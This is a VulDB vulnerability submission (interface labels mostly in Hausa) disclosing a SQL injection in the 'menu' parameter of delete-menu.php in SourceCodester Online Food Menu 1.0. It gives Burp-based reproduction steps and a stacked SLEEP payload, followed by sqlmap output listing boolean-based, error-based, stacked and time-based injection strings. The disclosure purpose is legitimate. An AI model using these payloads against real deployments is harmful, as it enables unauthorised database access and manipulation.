| Kura | SourceCodester Online Food Menu 1.0 SQL Injection |
|---|
| Gaskiya | Dear Vuldb
I hope this message finds you well. I would like to report a SQL injection vulnerability I discovered in the sourcecodester of the Online Food Menu Using PHP and MySQL with Source Code during my testing.
Details:
Affected URL/Endpoint: /food-menu/endpoint/delete-menu.php
Vulnerable Parameter: menu
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Navigate to the Admin area page.
2) Use a proxy like burpsuite to intercept the "delete-menu" request.
3) Input the payload "/food-menu/endpoint/delete-menu.php?menu=4';SELECT+SLEEP(7)%23" to invoke the SQL injection.
4) the menu is also vulnerable to the following attackes after running sqlmap on it.
arameter: menu (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: menu=4' AND EXTRACTVALUE(8269,CASE WHEN (8269=8269) THEN 8269 ELSE 0x3A END)-- jhtJ
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: menu=4' AND GTID_SUBSET(CONCAT(0x71627a6a71,(SELECT (ELT(1777=1777,1))),0x716b6a7071),1777)-- uuXb
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: menu=4';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: menu=4' AND (SELECT 7516 FROM (SELECT(SLEEP(5)))ythw)-- AVNZ
Please let me know if you need further information or a more detailed analysis.
Best regards,
[Your Name] |
|---|
| Màdùmga | Delvy (UID 74555) |
|---|
| Furta | 09/06/2024 04:30 (1 Shettima 전) |
|---|
| Gargajiya | 09/06/2024 23:30 (19 hours later) |
|---|
| Halitta | Shingilam |
|---|
| VulDB gite | 276779 [SourceCodester Online Food Menu 1.0 delete-menu.php menu SQL Injection] |
|---|
| Nganji | 17 |
|---|